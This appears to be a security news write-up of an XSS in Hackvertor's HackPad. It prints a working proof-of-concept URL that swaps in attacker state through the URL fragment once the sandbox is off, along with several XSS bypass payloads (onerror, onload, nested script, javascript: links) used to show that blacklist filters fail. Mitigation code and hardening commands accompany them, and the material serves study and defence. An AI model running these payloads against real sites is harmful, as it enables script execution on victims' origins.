Exploiting Hackvertor Parser Bug: XSS via HackPad

Gareth Heyes, a researcher at PortSwigger Web Security, found a parser bug in Hackvertor that allows cross-site scripting (XSS) through HackPad, Hackvertor's web editor at hackvertor.co.uk. HackPad loads its state from the URL fragment: a base64-encoded JSON object holding the editor input, the HTML input, a CSP string and a charset. A malicious site that opened HackPad with `window.open()` keeps a handle to the new window and can set its `window.location.hash` at any later time. A fragment-only navigation does not reload the page, so the PoC waits for the user to disable the sandbox, then swaps in attacker-chosen state that runs on the hackvertor.co.uk origin when the user clicks Execute.

Exploit Steps:

1. The user visits a malicious site.

2. The user clicks a link; the site opens HackPad (https://hackvertor.co.uk/hack-pad) in a new window with `window.open()` and keeps the returned window handle.

3. The user disables the sandbox in HackPad.

4. The malicious site sets the new window's location to the same HackPad URL with an attacker-chosen fragment (`window.location.hash`). Because only the fragment changes, the page is not reloaded and the sandbox stays disabled. In the PoC this happens on a 10-second timer.

5. The user clicks "Execute" in HackPad.

6. The XSS payload (`alert(document.domain)` in the PoC) runs on the hackvertor.co.uk origin.

Proof of Concept (PoC) URL:

https://portswigger-labs.net/mxss/?input=%3Ca%20href%3D%23%20onclick%3D%22win%3Dwindow.open(%27https%3A%2F%2Fhackvertor.co.uk%2Fhack-pad%27)%3BsetTimeout(x%3D%3Ewin.location%3D%27https%3A%2F%2Fhackvertor.co.uk%2Fhack-pad%23eyJpbnB1dCI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikiLCJodG1sSW5wdXQiOiIiLCJjc3AiOiJkZWZhdWx0LXNyYyBkYXRhOjsgc2NyaXB0LXNyYyBkYXRhOiAndW5zYWZlLWV2YWwnICd1bnNhZmUtaW5saW5lJztzdHlsZS1zcmMgZGF0YTogJ3Vuc2FmZS1pbmxpbmUnOyIsImNoYXJzZXQiOiJVVEYtOCJ9%27%2C10000)%22%3Etest%3C%2Fa%3E

URL-decoded, the `input` parameter is a link whose onclick handler opens HackPad and, 10 seconds later, navigates that window to the same URL with the attacker's fragment appended:

    win=window.open('https://hackvertor.co.uk/hack-pad');
    setTimeout(x=>win.location='https://hackvertor.co.uk/hack-pad#<fragment>',10000)

The fragment (the `eyJp...` string after `%23`) is base64-encoded JSON:

    {"input":"alert(document.domain)","htmlInput":"","csp":"default-src data:; script-src data: 'unsafe-eval' 'unsafe-inline';style-src data: 'unsafe-inline';","charset":"UTF-8"}

Note that the state carries its own `csp` value, permitting `'unsafe-inline'`, `'unsafe-eval'` and `data:` script sources, next to the `input` that runs when Execute is clicked.
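The state-loading behaviour behind the PoC, as an added example that is not Hackvertor's code: it decodes the fragment from the PoC URL, checks the CSP it carries for sources that permit inline script and eval, and contrasts a loader that applies every field with a hardened one that keeps the policy server-side and refuses to silently apply a fragment that changes after the initial load. The field names come from the decoded PoC; the loader logic, `SERVER_CSP` and all function names are assumptions made for this example.

```javascript
'use strict';
// Added example (not Hackvertor's code). Models how an editor page such as
// HackPad can restore its state from window.location.hash, and contrasts a
// loader that trusts every field with one that does not. Field names come
// from decoding the PoC fragment; loader logic and SERVER_CSP are assumptions.

// The fragment exactly as it appears in the PoC URL (base64-encoded JSON).
const POC_HASH =
  '#eyJpbnB1dCI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikiLCJodG1sSW5wdXQiOiIiLCJjc3AiOiJkZWZhdWx0LXNyYyBkYXRhOjsgc2NyaXB0LXNyYyBkYXRhOiAndW5zYWZlLWV2YWwnICd1bnNhZmUtaW5saW5lJztzdHlsZS1zcmMgZGF0YTogJ3Vuc2FmZS1pbmxpbmUnOyIsImNoYXJzZXQiOiJVVEYtOCJ9';

// Decode the base64 JSON after '#'. Returns null for an empty fragment.
function decodeStateFromHash(hash) {
  const b64 = hash.startsWith('#') ? hash.slice(1) : hash;
  if (b64 === '') return null;
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Parse a CSP string into { directive: [source, ...] }.
function parseCsp(csp) {
  const directives = {};
  for (const part of String(csp).split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Script sources that let anyone who controls page content run script.
const RISKY_SCRIPT_SOURCES = new Set(["'unsafe-inline'", "'unsafe-eval'", 'data:', 'blob:', '*']);

// Risky sources in script-src (falling back to default-src, as browsers do).
function riskyScriptSources(csp) {
  const d = parseCsp(csp);
  const sources = d['script-src'] || d['default-src'] || [];
  return sources.filter((s) => RISKY_SCRIPT_SOURCES.has(s.toLowerCase()));
}

// Vulnerable loader: the fragment decides the page's own CSP and the editor
// contents. A caller that runs this on every hashchange lets the opener swap
// the state after the user has disabled the sandbox.
function applyStateUnsafe(hash) {
  const s = decodeStateFromHash(hash) || {};
  return { csp: s.csp, input: s.input, htmlInput: s.htmlInput, charset: s.charset };
}

// Policy the application serves itself (assumed value); never taken from a URL.
const SERVER_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Hardened loader:
//  * the csp field is ignored: policy is a server decision, not editor state
//  * only known string fields are restored, and charset is allow-listed
//  * a fragment change after the initial load (what the PoC's
//    `win.location = '...#...'` causes from the opener) is not applied
//    silently: the sandbox goes back on and the state waits for confirmation
function applyStateHardened(hash, { initialLoad, sandboxDisabled }) {
  const s = decodeStateFromHash(hash) || {};
  const text = (v) => (typeof v === 'string' ? v : '');
  const restored = {
    csp: SERVER_CSP,
    input: text(s.input),
    htmlInput: text(s.htmlInput),
    charset: ['UTF-8', 'ISO-8859-1'].includes(s.charset) ? s.charset : 'UTF-8',
  };
  if (!initialLoad) {
    return {
      accepted: false,
      sandboxDisabled: false,
      pending: restored,
      reason: 'fragment changed after load; confirm before applying',
    };
  }
  return { accepted: true, sandboxDisabled: Boolean(sandboxDisabled), ...restored };
}

// Stand-alone run: what the PoC fragment makes each loader do.
const pocState = decodeStateFromHash(POC_HASH);
console.log('fragment state:', pocState);
console.log('risky script sources in fragment CSP:', riskyScriptSources(pocState.csp));
console.log('unsafe loader:', applyStateUnsafe(POC_HASH));
console.log('hardened, late hashchange:', applyStateHardened(POC_HASH, { initialLoad: false, sandboxDisabled: true }));
```

The check that matters is the one the fragment cannot influence: the policy comes from the server, and the input from the URL is restored as text only. A hashchange handler that re-runs `applyStateHardened` with `initialLoad: false` gets a pending state and a re-enabled sandbox instead of a silent swap.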

You Should Know:

Preventing XSS in Web Applications

1. Sanitize User Input (and encode output for its context):

// Blacklist filter: strips <script>...</script> pairs only. It does nothing
// against <img onerror=...>, <svg onload=...> or javascript: URLs, so treat it
// as defence in depth and encode output for its HTML context instead.
function sanitizeInput(input) {
  return input.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

2. Use Content Security Policy (CSP):

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'">

A policy that lists 'unsafe-inline', 'unsafe-eval' and data: under script-src is the same permissive policy the PoC fragment carries and blocks nothing. Serve the policy as an HTTP response header where possible, and never let it be set from URL or user-supplied data.

3. Restrict Dangerous JavaScript Functions (through CSP, not by deleting globals):

// Removing globals is not a security boundary: eval is a configurable property
// so the delete succeeds, but code can take a fresh copy from a new iframe or
// use new Function(), and deleting setTimeout breaks the page itself. Leaving
// 'unsafe-eval' out of script-src blocks eval, new Function() and string
// arguments to setTimeout in one place.
delete window.eval;
delete window.setTimeout;
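To show why item 1 on its own is not a defence, here is an added example (not from the original page) that runs the regex blacklist from item 1 beside context-aware HTML encoding over a few constructed payloads. `looksExecutable` is a deliberately rough heuristic for markup a browser would treat as executable; the payloads and function names are constructed for this example.

```javascript
'use strict';
// Added example, not code from the original page. Runs the page's
// "strip <script> tags" filter beside context-aware output encoding over
// constructed payloads to show why a blacklist is not an XSS defence.

// Blacklist filter, as on this page, with the regex matching a whole tag.
function stripScriptTags(input) {
  return input.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

// Encode for an HTML text or quoted-attribute context: the browser renders
// the characters but never parses them as markup.
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;' };
  return String(input).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Rough heuristic: does the string still contain markup a browser would run?
// (A real check would parse with a DOM parser; this is enough for the demo.)
function looksExecutable(html) {
  return /<script\b/i.test(html)
    || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html)      // any tag with an on* handler
    || /href\s*=\s*["']?\s*javascript:/i.test(html); // javascript: link
}

// Constructed payloads: the first is the only one the filter handles.
const PAYLOADS = [
  '<script>alert(document.domain)</script>',
  '<img src=x onerror=alert(document.domain)>',      // no script tag at all
  '<svg onload=alert(document.domain)>',              // event handler, no script tag
  '<scr<script>ipt>alert(document.domain)</scr</script>ipt>', // filter output reassembles <script>
  '<a href="javascript:alert(document.domain)">x</a>', // URL scheme, no script tag
];

// Run both treatments over every payload and report what survives.
function evaluate(payloads) {
  return payloads.map((p) => {
    const stripped = stripScriptTags(p);
    const encoded = encodeForHtml(p);
    return {
      payload: p,
      stripped,
      stillExecutableAfterStrip: looksExecutable(stripped),
      encoded,
      stillExecutableAfterEncode: looksExecutable(encoded),
    };
  });
}

for (const r of evaluate(PAYLOADS)) {
  console.log(`${r.payload}\n  strip  -> ${r.stripped}  executable=${r.stillExecutableAfterStrip}` +
              `\n  encode -> ${r.encoded}  executable=${r.stillExecutableAfterEncode}`);
}
```

The nested payload is the instructive one: the filter removes the inner `<script>...</script>` span and what is left is `<script>`, so a single pass of a blacklist can manufacture the very tag it was meant to remove. Encoding never has that problem because it changes the characters, not the structure.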

Linux Security Commands:

  • Check for listening sockets (ss replaces the deprecated netstat; the original `| grep LISTEN` also dropped every UDP line, since UDP sockets have no LISTEN state):
    sudo ss -tulnp
    
  • Audit file permissions (world-writable files under the web root, not only those with mode exactly 777):
    find /var/www -type f -perm -0002 -exec ls -la {} \;
    
  • Limit who can run an interpreter. This does not prevent command injection, which is fixed in the application by never passing untrusted input to a shell, and restricting /usr/bin/python can break system tooling that depends on it, so test on a non-production host first:
    sudo chmod 750 /usr/bin/python
    

Windows Security Commands:

  • Check running processes started from a Temp directory (`-like "temp"` matches only a path that is exactly "temp"; a wildcard pattern is needed):
    Get-Process | Where-Object { $_.Path -like "*\Temp\*" }
    
  • Disable SSL 2.0 on the server side (create the key first if it does not exist; the change takes effect after a reboot and is general TLS hardening, not an XSS control):
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -Name Enabled -Value 0 -Type DWord
    

What Undercode Say:

This exploit shows more than the risk of turning off a sandbox. HackPad accepted security-relevant state, including its own CSP, from the URL fragment, and a window opened by another origin can have its fragment rewritten at any time without a reload, so a protection the user had already disabled never came back when the state changed. Keep the CSP a server-side header, treat anything loaded from the URL as untrusted input, re-apply protections (or ask for confirmation) when that state changes after load, and avoid unsafe JavaScript functions by leaving 'unsafe-eval' and 'unsafe-inline' out of the policy.

Expected Output:

With the sandbox disabled and Execute clicked, the `alert(document.domain)` from the PoC fragment runs and displays hackvertor.co.uk, i.e. arbitrary script execution on the HackPad origin.

Prediction:

Future web security tools may enforce stricter sandboxing by default, preventing similar bypasses. Researchers will likely find more edge cases in parser behavior, leading to improved sanitization techniques.

References:

Reported By: Gareth Heyes – Hackers Feeds